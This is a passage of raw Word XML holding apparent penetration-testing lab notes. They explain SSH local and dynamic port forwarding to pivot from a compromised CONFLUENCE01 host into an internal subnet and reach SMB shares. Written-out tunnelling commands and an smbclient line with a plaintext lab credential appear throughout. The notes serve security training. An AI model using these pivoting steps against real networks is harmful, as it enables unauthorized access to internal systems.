      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083C">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Most of the connections time out, suggesting that there's nothing there. In contrast, we'll notice that PGDATABASE01 (at 172.16.50.215) actively refused the connection. We also find that there is a host on the subnet, which has TCP port 445 open: 172.16.50.217!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We want to be able to enumerate the SMB service on this host. If we find anything, we want to download it directly to our Kali machine for inspection. There are at least two ways we could do this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000083F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we know target machine IP, we want to be able to directly access that machine from our Kali. We can port forward with SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000840">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bpj5kd8mcctw" w:id="75"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Port Forwarding using SSH</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A local port forward can be set up using OpenSSH’s</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> option,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which takes a forwarding rule in the format:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000843">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOCAL_IP:]LOCAL_PORT:DEST_IP:DEST_PORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000844">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first part "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LOCAL_IP:LOCAL_PORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">defines the listening socket on the SSH client — where packets will enter the tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000845">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="323"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The second part "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DEST_IP:DEST_PORT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" defines the destination socket on the SSH server side — where packets will be forwarded to after tunneling.</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000849">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We run this on CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, we will instruct SSH to listen on all interfaces on port 4455 on CONFLUENCE01 (0.0.0.0:4455), then forward all packets (through the SSH tunnel to PGDATABASE01) to port 445 on the newly found host (172.16.50.217:445).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: We're listening on port 4455 on CONFLUENCE01 because we're running as the confluence user: we don't have the permissions to listen on any port below 1024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="709"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll pass the local port forwarding argument we just put together to -L, and use -N to prevent a shell from being opened.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we've entered the password, we don't receive any output. When running SSH with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag, this is normal. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag prevents SSH from executing any remote commands, meaning we will only receive output related to our port forward.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000084F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000850">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Info:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the SSH connection or the port forwarding fails for some reason, and the output we get from the standard SSH session isn't sufficient to troubleshoot it, we can pass the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to ssh in order to receive debug output.</w:t>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We can now run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to see that it's listening on port 4455 and accepting any IP address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000853">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2844800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="83" name="image78.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image78.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="320"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu</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t xml:space="preserve">Now we can directly interact with port 445 (SMB) of the target machine from our kali. But, we specify the port and IP of CONFLUENCE01</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000085A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4455 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since that's the listening port of CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000085B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="413"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We specify </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.63 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since that's IP of CONFLUENCE01</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1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ra7gcji5lwnw" w:id="76"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH Dynamic Port Forwarding</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TLDR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: In a complex situation with Kali, JUMP1, JUMP2, and Target, we set up SSH client on JUMP1 and SSH Server on JUMP2. And the SSH client has SOCKS5 PROXY, which we connect to from our Kali using proxychains. This makes it so that anytime we use the proxychains command, it gets sent to the proxy, which gets SSH tunneled to JUMP2. And then the end result is being able to write commands from our kali as if we are JUMP2, so we specify the IP and Port of Target directly. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000861">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We no longer are no longer writing the IP and Port of the SSH client, as we did before, like in SSH Local Port Forwarding</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Local port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has one glaring limitation: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we can only connect to one socket </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">per SSH connection. Luckily, OpenSSH also provides </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic port forwarding.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> From a single listening port on the SSH client, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">packets can be forwarded to any socket that the SSH server host has access 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SSH dynamic port forwarding works because the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the SSH client creates is a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy server port</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. SOCKS is a proxying protocol. Much like a postal service, a SOCKS server accepts packets (with a SOCKS protocol header) and forwards them on to wherever they're addressed.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000868">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="505"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The forwarding behavior here isn’t automatic or "magic" —it works because client tools like Proxychains wrap outbound connections in SOCKS protocol headers. These headers tell the SOCKS server (in this case, OpenSSH) where to send the traffic. Without them, the server can’t forward the packets correctly.</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b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The only limitation</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that the packets must be properly formatted - most often by SOCK-compatible client software. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In some cases, software is not SOCKS-compatible by default.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We can get around this using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">proxychains</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which wrap outbound connections in SOCKS protocol headers. </w:t>
      </w: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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1892300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="481" name="image459.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image459.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId188"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="189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E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what we want to achieve. It's the same as the SSH local port forward except we are wrapping our packets in SOCKS format when we send it to CONFLUENCE01, and now PGDATABASE01 can send packets to any sockets (socket is a IP address and port, like 10.5.5.5:22)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000086F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="871"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal here is to be able to access port 445 (SMB) of HRSHARES, and other sockets in the INTERNAL subnet, all from our Kali!</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x9cp9ylzd0oi" w:id="77"/>
      <w:bookmarkEnd w:id="77"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic Port Forwarding with SSH</w:t>
      </w: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We run this from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and try to connect to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PGDATABASE01, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to strat a SOCKS5 proxy on CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000874">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
